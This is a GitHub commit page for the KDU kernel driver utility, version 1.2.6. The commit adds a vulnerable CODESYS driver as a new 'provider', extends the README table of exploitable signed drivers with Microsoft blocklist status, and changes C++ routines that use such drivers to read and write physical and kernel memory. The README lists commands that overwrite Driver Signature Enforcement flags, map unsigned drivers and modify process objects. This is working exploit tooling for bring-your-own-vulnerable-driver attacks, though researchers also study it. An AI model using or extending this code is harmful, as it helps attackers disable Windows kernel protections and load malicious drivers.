Skip to content

Commit

Permalink
v 1.2.6
Browse files Browse the repository at this point in the history 
Added CODESYS SysDrv3S as provider 24
Some minor changes
Readme updated to include MSFT blacklist notice in the table of the supported providers
  • Loading branch information
@hfiref0x
hfiref0x committed Oct 16, 2022
1 parent 7d3e633 commit f1416c8
Show file tree
Hide file tree
Showing 53 changed files with 327 additions and 166 deletions.
Binary file modified Bin/drv64.dll
View file
Binary file not shown.
Binary file modified Bin/kdu.exe
View file
Binary file not shown.
109 changes: 55 additions & 54 deletions KDU.sha256
View file

Large diffs are not rendered by default.

57 changes: 31 additions & 26 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -20,11 +20,13 @@ It features:
#### Usage

###### KDU -list
###### KDU -diag
###### KDU -prv ProviderID
###### KDU -ps ProcessID
###### KDU -dse value
###### KDU -map filename
* -list - list currently available providers;
* -diag - run system diagnostic for troubleshooting;
* -prv - optional, select vulnerability driver provider;
* -ps - modify process object of given ProcessID;
* -dse - write user defined value to the system DSE state flags;
Expand Down Expand Up @@ -97,32 +99,35 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware

# Currently Supported Providers

| Provider Id | Product Vendor | Driver | Software package | Code base | Version |
|-------------|----------------|-------------|------------------------------------|-------------------|-----------------------------|
| 0 | Intel | IQVM64/Nal | Network Adapter Diagnostic Driver | Original | 1.03.0.7 |
| 1 | MSI | RTCore64 | MSI Afterburner | Semi-original | 4.6.2 build 15658 and below |
| 2 | Gigabyte | Gdrv | Gigabyte TOOLS | MAPMEM NTDDK 3.51 | Undefined |
| 3 | ASUSTeK | ATSZIO64 | ASUSTeK WinFlash utility | Semi-original | Undefined |
| 4 | Patriot | MsIo64 | Patriot Viper RGB utility | WINIO | 1.0 |
| 5 | ASRock | GLCKIO2 | ASRock Polychrome RGB | WINIO | 1.0.4 |
| 6 | G.SKILL | EneIo64 | G.SKILL Trident Z Lighting Control | WINIO | 1.00.08 |
| 7 | EVGA | WinRing0x64 | EVGA Precision X1 | WINRING0 | 1.0.2.0 |
| 8 | Thermaltake | EneTechIo64 | Thermaltake TOUGHRAM software | WINIO | 1.0.3 |
| 9 | Huawei | PhyMemx64 | Huawei MateBook Manager software | WINIO | Undefined |
| 10 | Realtek | RtkIo64 | Realtek Dash Client Utility | PHYMEM | Various |
| 11 | MSI | EneTechIo64 | MSI Dragon Center | WINIO | Various |
| 12 | LG | LHA | LG Device Manager | Semi-original | 1.6.0.2 |
| 13 | ASUSTeK | AsIO2 | ASUS GPU Tweak | WINIO | 2.1.7.1 and below |
| 14 | PassMark | DirectIo64 | PassMark Performance Test | Original | 10.1 and below |
| 15 | GMER | GmerDrv | Gmer "Antirootkit" | Original | 2.2 and below |
| 16 | Dell | DBUtil_2_3 | Dell BIOS Utility | Original | 2.3 and below |
| 17 | Benjamin Delpy | Mimidrv | Mimikatz | Original | 2.2 and below |
| 18 | Wen Jia Liu | KProcessHacker2 | Process Hacker | Original | 2.38 and below |
| 19 | Microsoft | ProcExp152 | Process Explorer | Original | 1.5.2 and below |
| 20 | Dell | DBUtilDrv2 | Dell BIOS Utility | Original | 2.7 and below |
| 21 | DarkByte | Dbk64 | Cheat Engine | Original | 7.4 and below |
| 22 | ASUSTeK | AsIO3 | ASUS GPU TweakII | WINIO | 2.3.0.3 |
| 23 | Marvin | Hw | Marvin Hardware Access Driver | Original | 4.9 and below |
| Provider Id | Product Vendor | Driver | Software package | Code base | Version | MSFT blacklisted by* |
|-------------|----------------|-------------|------------------------------------|-------------------|-----------------------------|----------------------|
| 0 | Intel | IQVM64/Nal | Network Adapter Diagnostic Driver | Original | 1.03.0.7 | Cert |
| 1 | MSI | RTCore64 | MSI Afterburner | Semi-original | 4.6.2 build 15658 and below | |
| 2 | Gigabyte | Gdrv | Gigabyte TOOLS | MAPMEM | Undefined | Name |
| 3 | ASUSTeK | ATSZIO64 | ASUSTeK WinFlash utility | Semi-original | Undefined | Name |
| 4 | Patriot | MsIo64 | Patriot Viper RGB utility | WINIO | 1.0 | Page hash |
| 5 | ASRock | GLCKIO2 | ASRock Polychrome RGB | WINIO | 1.0.4 | Page hash |
| 6 | G.SKILL | EneIo64 | G.SKILL Trident Z Lighting Control | WINIO | 1.00.08 | Cert |
| 7 | EVGA | WinRing0x64 | EVGA Precision X1 | WINRING0 | 1.0.2.0 | Name |
| 8 | Thermaltake | EneTechIo64 | Thermaltake TOUGHRAM software | WINIO | 1.0.3 | Page hash |
| 9 | Huawei | PhyMemx64 | Huawei MateBook Manager software | WINIO | Undefined | Name, Page hash |
| 10 | Realtek | RtkIo64 | Realtek Dash Client Utility | PHYMEM | Various | Name |
| 11 | MSI | EneTechIo64 | MSI Dragon Center | WINIO | Various | |
| 12 | LG | LHA | LG Device Manager | Semi-original | 1.6.0.2 | Name |
| 13 | ASUSTeK | AsIO2 | ASUS GPU Tweak | WINIO | 2.1.7.1 and below | |
| 14 | PassMark | DirectIo64 | PassMark Performance Test | Original | 10.1 and below | Page hash |
| 15 | GMER | GmerDrv | Gmer "Antirootkit" | Original | 2.2 and below | |
| 16 | Dell | DBUtil_2_3 | Dell BIOS Utility | Original | 2.3 and below | Page hash |
| 17 | Benjamin Delpy | Mimidrv | Mimikatz | Original | 2.2 and below | Cert |
| 18 | Wen Jia Liu | KProcessHacker2 | Process Hacker | Original | 2.38 and below | Name |
| 19 | Microsoft | ProcExp152 | Process Explorer | Original | 1.5.2 and below | |
| 20 | Dell | DBUtilDrv2 | Dell BIOS Utility | Original | 2.7 and below | |
| 21 | DarkByte | Dbk64 | Cheat Engine | Original | 7.4 and below | Cert, Name |
| 22 | ASUSTeK | AsIO3 | ASUS GPU TweakII | WINIO | 2.3.0.3 | |
| 23 | Marvin | Hw | Marvin Hardware Access Driver | Original | 4.9 and below | Name |
| 24 | CODESYS | SysDrv3S | CODESYS SysDrv3S | MAPMEM | 3.5.6 and below | |

###### *At commit time, data maybe inaccurate.

More providers maybe added in the future.

Expand Down
4 changes: 2 additions & 2 deletions Source/Hamakaze/KDU.vcxproj.user
View file
Original file line number Diff line number Diff line change
@@ -1,11 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>-diag</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 24 -map c:\OpA22\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>-list</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 24 -map c:\OpA22\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
9 changes: 5 additions & 4 deletions Source/Hamakaze/consts.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 1.25
* VERSION: 1.26
*
* DATE: 17 Aug 2022
* DATE: 16 Oct 2022
*
* Global consts.
*
Expand All @@ -21,8 +21,8 @@

#define KDU_VERSION_MAJOR 1
#define KDU_VERSION_MINOR 2
#define KDU_VERSION_REVISION 5
#define KDU_VERSION_BUILD 2208
#define KDU_VERSION_REVISION 6
#define KDU_VERSION_BUILD 2210

#define KDU_BASE_ID 0xff123456
#define KDU_SYNC_MUTANT 0xabcd
Expand Down Expand Up @@ -86,3 +86,4 @@
#define IDR_DBK64 124
#define IDR_ASUSIO3 125
#define IDR_HW64 126
#define IDR_SYSDRV3S 127
76 changes: 46 additions & 30 deletions Source/Hamakaze/idrv/mapmem.cpp
View file
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2021
* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: MAPMEM.CPP
*
* VERSION: 1.11
* VERSION: 1.26
*
* DATE: 19 Apr 2021
* DATE: 15 Oct 2022
*
* MAPMEM driver routines.
*
Expand All @@ -21,7 +21,7 @@
#include "idrv/mapmem.h"

//
// Gigabyte driver based on MAPMEM.SYS Microsoft Windows NT 3.51 DDK example from 1993.
// Gigabyte/CODESYS/SuperBMC/etc drivers are based on MAPMEM.SYS Microsoft Windows NT 3.51 DDK example from 1993.
//

ULONG g_MapMem_MapIoctl;
Expand All @@ -42,10 +42,16 @@ PVOID MapMemMapMemory(
{
PVOID pMapSection = NULL;
MAPMEM_PHYSICAL_MEMORY_INFO request;
ULONG_PTR offset;
ULONG mapSize;

RtlSecureZeroMemory(&request, sizeof(request));
request.BusAddress.QuadPart = PhysicalAddress;
request.Length = NumberOfBytes;

offset = PhysicalAddress & ~(PAGE_SIZE - 1);
mapSize = (ULONG)(PhysicalAddress - offset) + NumberOfBytes;

request.BusAddress.QuadPart = offset;
request.Length = mapSize;

if (supCallDriver(DeviceHandle,
g_MapMem_MapIoctl,
Expand Down Expand Up @@ -129,14 +135,14 @@ BOOL WINAPI GioVirtualToPhysicalEx(
}

/*
* GioQueryPML4Value
* MapMemQueryPML4Value
*
* Purpose:
*
* Locate PML4.
*
*/
BOOL WINAPI GioQueryPML4Value(
BOOL WINAPI MapMemQueryPML4Value(
_In_ HANDLE DeviceHandle,
_Out_ ULONG_PTR* Value)
{
Expand Down Expand Up @@ -165,34 +171,34 @@ BOOL WINAPI GioQueryPML4Value(
}

/*
* GioVirtualToPhysical
* MapMemVirtualToPhysical
*
* Purpose:
*
* Translate virtual address to the physical.
*
*/
BOOL WINAPI GioVirtualToPhysical(
BOOL WINAPI MapMemVirtualToPhysical(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR VirtualAddress,
_Out_ ULONG_PTR* PhysicalAddress)
{
return PwVirtualToPhysical(DeviceHandle,
GioQueryPML4Value,
GioReadPhysicalMemory,
MapMemQueryPML4Value,
MapMemReadPhysicalMemory,
VirtualAddress,
PhysicalAddress);
}

/*
* GioReadWritePhysicalMemory
* MapMemReadWritePhysicalMemory
*
* Purpose:
*
* Read/Write physical memory.
*
*/
BOOL WINAPI GioReadWritePhysicalMemory(
BOOL WINAPI MapMemReadWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
Expand All @@ -203,6 +209,8 @@ BOOL WINAPI GioReadWritePhysicalMemory(
DWORD dwError = ERROR_SUCCESS;
PVOID mappedSection = NULL;

ULONG_PTR offset;

//
// Map physical memory section.
//
Expand All @@ -212,13 +220,15 @@ BOOL WINAPI GioReadWritePhysicalMemory(

if (mappedSection) {

offset = PhysicalAddress - (PhysicalAddress & ~(PAGE_SIZE - 1));

__try {

if (DoWrite) {
RtlCopyMemory(mappedSection, Buffer, NumberOfBytes);
RtlCopyMemory(RtlOffsetToPointer(mappedSection, offset), Buffer, NumberOfBytes);
}
else {
RtlCopyMemory(Buffer, mappedSection, NumberOfBytes);
RtlCopyMemory(Buffer, RtlOffsetToPointer(mappedSection, offset), NumberOfBytes);
}

bResult = TRUE;
Expand All @@ -245,56 +255,56 @@ BOOL WINAPI GioReadWritePhysicalMemory(
}

/*
* GioReadPhysicalMemory
* MapMemReadPhysicalMemory
*
* Purpose:
*
* Read from physical memory.
*
*/
BOOL WINAPI GioReadPhysicalMemory(
BOOL WINAPI MapMemReadPhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
return GioReadWritePhysicalMemory(DeviceHandle,
return MapMemReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
FALSE);
}

/*
* GioWritePhysicalMemory
* MapMemWritePhysicalMemory
*
* Purpose:
*
* Write to physical memory.
*
*/
BOOL WINAPI GioWritePhysicalMemory(
BOOL WINAPI MapMemWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
return GioReadWritePhysicalMemory(DeviceHandle,
return MapMemReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
TRUE);
}

/*
* GioWriteKernelVirtualMemory
* MapMemWriteKernelVirtualMemory
*
* Purpose:
*
* Write virtual memory via GDRV.
*
*/
BOOL WINAPI GioWriteKernelVirtualMemory(
BOOL WINAPI MapMemWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
Expand All @@ -305,13 +315,13 @@ BOOL WINAPI GioWriteKernelVirtualMemory(

SetLastError(ERROR_SUCCESS);

bResult = GioVirtualToPhysical(DeviceHandle,
bResult = MapMemVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);

if (bResult) {

bResult = GioReadWritePhysicalMemory(DeviceHandle,
bResult = MapMemReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
Expand All @@ -323,14 +333,14 @@ BOOL WINAPI GioWriteKernelVirtualMemory(
}

/*
* GioReadKernelVirtualMemory
* MapMemReadKernelVirtualMemory
*
* Purpose:
*
* Read virtual memory via GDRV.
*
*/
BOOL WINAPI GioReadKernelVirtualMemory(
BOOL WINAPI MapMemReadKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
Expand All @@ -341,13 +351,13 @@ BOOL WINAPI GioReadKernelVirtualMemory(

SetLastError(ERROR_SUCCESS);

bResult = GioVirtualToPhysical(DeviceHandle,
bResult = MapMemVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);

if (bResult) {

bResult = GioReadWritePhysicalMemory(DeviceHandle,
bResult = MapMemReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
Expand Down Expand Up @@ -375,6 +385,12 @@ BOOL WINAPI MapMemRegisterDriver(
UNREFERENCED_PARAMETER(DeviceHandle);

switch (DriverId) {

case IDR_SYSDRV3S:
g_MapMem_MapIoctl = IOCTL_MAPMEM_MAP_USER_PHYSICAL_MEMORY;
g_MapMem_UnmapIoctl = IOCTL_MAPMEM_UNMAP_USER_PHYSICAL_MEMORY;
break;

case IDR_GDRV:
default:
g_MapMem_MapIoctl = IOCTL_GDRV_MAP_USER_PHYSICAL_MEMORY;
Expand Down
Loading

0 comments on commit f1416c8

Please sign in to comment.